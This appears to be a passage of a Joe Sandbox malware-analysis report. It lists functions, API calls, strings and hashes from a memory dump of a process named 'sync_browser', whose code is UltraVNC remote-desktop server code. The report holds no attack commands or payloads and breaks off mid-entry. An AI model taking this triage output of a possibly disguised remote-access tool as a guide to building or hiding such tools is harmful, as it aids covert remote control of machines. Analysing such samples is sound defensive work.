l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF7D59455BD
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF7D594561C
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF7D594577E
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF7D5945603
l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF7D594564A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
API String ID: 181403729-1081969236
Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction ID: 4cef316ed62041ae025cb29e5af30997d6c2cd242a7c36d9de0230e221fbcf33
Opcode Fuzzy Hash: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
Instruction Fuzzy Hash: 49513661A195D283F718EB64A8506FCA790EF85B58FC4403BED8E4B695DF3CD50AC360

Function 00007FF7D593B030 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 135COMMON

Download Yara Rule

APIs

_wgetenv.LIBCMT ref: 00007FF7D593B08C
_wgetenv.LIBCMT ref: 00007FF7D593B05E

Part of subcall function 00007FF7D59E9500: _errno.LIBCMT ref: 00007FF7D59E9515
Part of subcall function 00007FF7D59E9500: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D59E9520

_wgetenv.LIBCMT ref: 00007FF7D593B0AE
_wgetenv.LIBCMT ref: 00007FF7D593B0DC
inet_ntoa.WS2_32 ref: 00007FF7D593B1C8
free.LIBCMT ref: 00007FF7D593B1D9
free.LIBCMT ref: 00007FF7D593B22C

Strings

HTTP_DIRECT, xrefs: 00007FF7D593B0A7, 00007FF7D593B0BB
!, xrefs: 00007FF7D593B14B
SOCKS4_DIRECT, xrefs: 00007FF7D593B049
SOCKS5_DIRECT, xrefs: 00007FF7D593B050
SOCKS_DIRECT, xrefs: 00007FF7D593B085, 00007FF7D593B099
CONNECT_DIRECT, xrefs: 00007FF7D593B0D5, 00007FF7D593B0E9

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: _wgetenv$free$_errno_invalid_parameter_noinfoinet_ntoa
String ID: !$CONNECT_DIRECT$HTTP_DIRECT$SOCKS4_DIRECT$SOCKS5_DIRECT$SOCKS_DIRECT
API String ID: 1123868200-453874877
Opcode ID: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
Instruction ID: 64f2c12395bcdc22752fe02dfb859d870574bae531e772c7399fb9ae849ac6cd
Opcode Fuzzy Hash: f4207ed447fdffa40201c704a00f463fe897cbc6349214418793c6f2e263591f
Instruction Fuzzy Hash: 61517862A0D682C6FE25AB11D5406BDA7A1EFA5F88FC80036DE4D47796EF3CE405C720

Function 00007FF7D5965100 Relevance: 22.7, APIs: 15, Instructions: 242COMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32 ref: 00007FF7D59651F4
CreateRectRgn.GDI32 ref: 00007FF7D59652DA
CombineRgn.GDI32 ref: 00007FF7D59652FA
DeleteObject.GDI32 ref: 00007FF7D5965303
free.LIBCMT ref: 00007FF7D596530C
CreateRectRgn.GDI32 ref: 00007FF7D59653B3
CombineRgn.GDI32 ref: 00007FF7D59653D3
DeleteObject.GDI32 ref: 00007FF7D59653DC
CreateRectRgn.GDI32 ref: 00007FF7D5965405
DeleteObject.GDI32 ref: 00007FF7D596542E
free.LIBCMT ref: 00007FF7D59653E5

Part of subcall function 00007FF7D59E8BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C0A
Part of subcall function 00007FF7D59E8BF4: _errno.LIBCMT ref: 00007FF7D59E8C14
Part of subcall function 00007FF7D59E8BF4: GetLastError.KERNEL32(?,?,?,00007FF7D59E748C), ref: 00007FF7D59E8C1C

Part of subcall function 00007FF7D59E92A4: malloc.LIBCMT ref: 00007FF7D59E92C7

CreateRectRgn.GDI32 ref: 00007FF7D5965456
CombineRgn.GDI32 ref: 00007FF7D5965476
DeleteObject.GDI32 ref: 00007FF7D596547F
free.LIBCMT ref: 00007FF7D5965488

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateRect$DeleteObject$Combinefree$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 1881577244-0
Opcode ID: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
Instruction ID: 7f3f7b0d6b3e0da9fce8f71260da6f41ca0ed4d6f6ac536a781caf51aa49d718
Opcode Fuzzy Hash: 7b57e6a86c69e11d924fc1659c6f441e4a7cff23a46561e18de1fdb13dff7902
Instruction Fuzzy Hash: 3AA1C272A186964BEB24AF26E444A6EBB55FBC8F98FD01236DE0E93754DF38D404C710

Function 00007FF7D59400D0 Relevance: 22.6, APIs: 15, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D593F840: CreateRectRgn.GDI32 ref: 00007FF7D593F872
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F88A
Part of subcall function 00007FF7D593F840: CombineRgn.GDI32 ref: 00007FF7D593F89F

GetRgnBox.GDI32 ref: 00007FF7D5940116
OffsetRgn.GDI32 ref: 00007FF7D5940135
SetRectRgn.GDI32 ref: 00007FF7D5940163
CombineRgn.GDI32 ref: 00007FF7D5940179
DeleteObject.GDI32 ref: 00007FF7D5940183
free.LIBCMT ref: 00007FF7D594018D
GetRgnBox.GDI32 ref: 00007FF7D594019A
OffsetRgn.GDI32 ref: 00007FF7D59401AF
SetRectRgn.GDI32 ref: 00007FF7D59401ED
CombineRgn.GDI32 ref: 00007FF7D5940203
DeleteObject.GDI32 ref: 00007FF7D594020D
free.LIBCMT ref: 00007FF7D5940217
GetRgnBox.GDI32 ref: 00007FF7D5940224
DeleteObject.GDI32 ref: 00007FF7D5940242
free.LIBCMT ref: 00007FF7D594024C

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Combine$DeleteObjectRectfree$Offset$Create
String ID:
API String ID: 2677898628-0
Opcode ID: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
Instruction ID: a6db8ac1a6fc7d84276f221971955a2775b35e0e9f1b382175ffc3b76cc11a85
Opcode Fuzzy Hash: 3ee7ecd204df7dd3f615213fc9b16b46c74043faa91b9eb9bd615f088202f8d8
Instruction Fuzzy Hash: E1412C72B249218AEB14EB76E8559AD7730FF88F98B804132DE1E67B68DF38D445C310

Function 00007FF7D595551D Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 293COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D5995F30: EnterCriticalSection.KERNEL32(?,?,?,00007FF7D5953ABC), ref: 00007FF7D5995F41
Part of subcall function 00007FF7D5995F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF7D5953ABC), ref: 00007FF7D5995F75

OpenInputDesktop.USER32 ref: 00007FF7D595407F
CloseDesktop.USER32 ref: 00007FF7D59540C2

Part of subcall function 00007FF7D5995F30: LeaveCriticalSection.KERNEL32(?,?,?,00007FF7D5953ABC), ref: 00007FF7D5995F8C

EnterCriticalSection.KERNEL32 ref: 00007FF7D59555F1
LeaveCriticalSection.KERNEL32 ref: 00007FF7D5955622
InvalidateRect.USER32 ref: 00007FF7D59556E7
LeaveCriticalSection.KERNEL32 ref: 00007FF7D59556FE

Strings

W, xrefs: 00007FF7D59555E4
vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$DesktopEnter$CloseInputInvalidateOpenRect
String ID: W$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 1769082246-4238595597
Opcode ID: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction ID: 008cd4a72adcf064a4db731e2211c0febbc8773ee879d57ee9b3b9df05e16486
Opcode Fuzzy Hash: 28edabc9feb7bdb14e1d1faffb3798e9d0b80a49f6f41662df86053fe061b59e
Instruction Fuzzy Hash: B2E1AE22A086D186E794EB29C458BFEBBA1EB85F98FC54032DE4D477A5CF38D451C720

Function 00007FF7D5955958 Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 266COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D59559AB

Part of subcall function 00007FF7D595C2C0: EnterCriticalSection.KERNEL32 ref: 00007FF7D595C326
Part of subcall function 00007FF7D595C2C0: LeaveCriticalSection.KERNEL32 ref: 00007FF7D595C33B

Strings

vncservice.cpp : OpenInputdesktop2 NULL, xrefs: 00007FF7D5954060
vncclient.cpp : vncClientThread , xrefs: 00007FF7D5954029
vncservice.cpp : SelectDesktop , xrefs: 00007FF7D595404B
X, xrefs: 00007FF7D59559A1
vncservice.cpp : OpenInputdesktop2 OK, xrefs: 00007FF7D595409A

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$Enter$Leave
String ID: X$vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
API String ID: 2801635615-1537001432
Opcode ID: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction ID: a7fae087a9452e951cfe1413c547258455b7c6d4769fe1d4e33669cd42bcb709
Opcode Fuzzy Hash: dd0377157924df05a1a969f1e9d28644e8767d3accdb4255640eb5cd2624909b
Instruction Fuzzy Hash: 65D1B322A086D186F790EB25C458BFEABA0EB85F88FC94132DE4D477A5CF39D455C720

Function 00007FF7D599D890 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 158COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF7D599D90A
LeaveCriticalSection.KERNEL32 ref: 00007FF7D599D97B

Strings

vsocket.cpp : socket error 1: %d, xrefs: 00007FF7D599DA00
vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error, xrefs: 00007FF7D599D958
vsocket.cpp : zero bytes read1, xrefs: 00007FF7D599D9D9
vsocket.cpp : zero bytes read2, xrefs: 00007FF7D599DAC7

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave
String ID: vsocket.cpp : WriteExact: DSMPlugin-RestoreBuffer Alloc Error$vsocket.cpp : socket error 1: %d$vsocket.cpp : zero bytes read1$vsocket.cpp : zero bytes read2
API String ID: 3168844106-4245644328
Opcode ID: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
Instruction ID: 2ee3b69e5ea2732c055c9b8a6e05187a2805b25a7bc2ebcf924ab1c37f8539be
Opcode Fuzzy Hash: fb51c5f38e3ceb32ba6187375171630d2d9d6b8a6abb1b1af77451ade3fe2d73
Instruction Fuzzy Hash: 1861722190CB8287E764AB2994847BDA6A4FF84F98FD81132DE5E536A4DF3CD505CB10

Function 00007FF7D5988080 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 85libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7D5989A40: GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5989A92
Part of subcall function 00007FF7D5989A40: RegOpenKeyExA.ADVAPI32 ref: 00007FF7D5989AC0

GetModuleFileNameA.KERNEL32 ref: 00007FF7D59880D1
LoadLibraryA.KERNEL32 ref: 00007FF7D598811D
GetProcAddress.KERNEL32 ref: 00007FF7D5988139
CoInitialize.OLE32 ref: 00007FF7D5988160
CoUninitialize.OLE32 ref: 00007FF7D5988192
FreeLibrary.KERNEL32 ref: 00007FF7D598819B

Strings

CheckUserPasswordSDUni result=%i, xrefs: 00007FF7D5988175
vncntlm.cpp : GetProcAddress, xrefs: 00007FF7D598813F
CUPSD, xrefs: 00007FF7D598812F
\authSSP.dll, xrefs: 00007FF7D59880FA
You selected ms-logon, but authSSP.dllwas not found.Check you installation, xrefs: 00007FF7D59881D6
WARNING, xrefs: 00007FF7D59881CF

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: Library$AddressFileFreeInitializeLoadModuleNameOpenPrivateProcProfileUninitialize
String ID: CUPSD$CheckUserPasswordSDUni result=%i$WARNING$You selected ms-logon, but authSSP.dllwas not found.Check you installation$\authSSP.dll$vncntlm.cpp : GetProcAddress
API String ID: 1719662965-904825817
Opcode ID: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
Instruction ID: cf5253fc9612976f3e0cadd3421826ca3fd4601742c7b8abbfe1797e63cc072f
Opcode Fuzzy Hash: 49f2f648c281e1af0c21fd0208b7c79f38fee02d2a9911ef4cddafc3a37f6c47
Instruction Fuzzy Hash: E3418061A08A9287FA24AB25A801ABDAB90FF88F94FC44433DD5D477A5DF3CE504C730

Function 00007FF7D59611E0 Relevance: 19.6, APIs: 13, Instructions: 103windowCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF7D596C1D6), ref: 00007FF7D5961206
CreateCompatibleBitmap.GDI32 ref: 00007FF7D5961221
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF7D596C1D6), ref: 00007FF7D5961236
SelectObject.GDI32 ref: 00007FF7D5961255
DeleteObject.GDI32 ref: 00007FF7D5961266
LeaveCriticalSection.KERNEL32(?,?,?,?,?,00000000,?,00000000,?,00007FF7D596C1D6), ref: 00007FF7D5961273

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalSection$LeaveObject$BitmapCompatibleCreateDeleteEnterSelect
String ID:
API String ID: 4219907860-0
Opcode ID: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction ID: ff13674fc19d9f42b5781b36020326ba16ce0dc8743f349d48f161f88fb2ccf2
Opcode Fuzzy Hash: 956026f9412a0f1138a85547ad9db4196a3aa927d16836a46ddc08f3773cee07
Instruction Fuzzy Hash: 894166226286928BE724AF25A844AAEB754FF88FD8FC05136DE4E57B58DF3CD105C710

Function 00007FF7D5941640 Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 132COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF7D5941671
GetModuleFileNameA.KERNEL32 ref: 00007FF7D59416B3
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5941767
GetPrivateProfileIntA.KERNEL32 ref: 00007FF7D5941790
GetPrivateProfileStringA.KERNEL32 ref: 00007FF7D59417CE

Strings

service_commandline, xrefs: 00007FF7D59417B3
kickrdp, xrefs: 00007FF7D5941759
clearconsole, xrefs: 00007FF7D594177C
admin, xrefs: 00007FF7D5941760, 00007FF7D5941783, 00007FF7D59417BF
_run, xrefs: 00007FF7D594172A
-service_run, xrefs: 00007FF7D594184B

Memory Dump Source

Source File: 00000015.00000002.3449535165.00007FF7D5931000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7D5930000, based on PE: true

Associated: 00000015.00000002.3449495595.00007FF7D5930000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449748846.00007FF7D5A3D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449835329.00007FF7D5A3F000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A40000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5A8B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3449889957.00007FF7D5AB8000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5AF1000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5B64000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff7d5930000_sync_browser.jbxd

Yara matches

Similarity

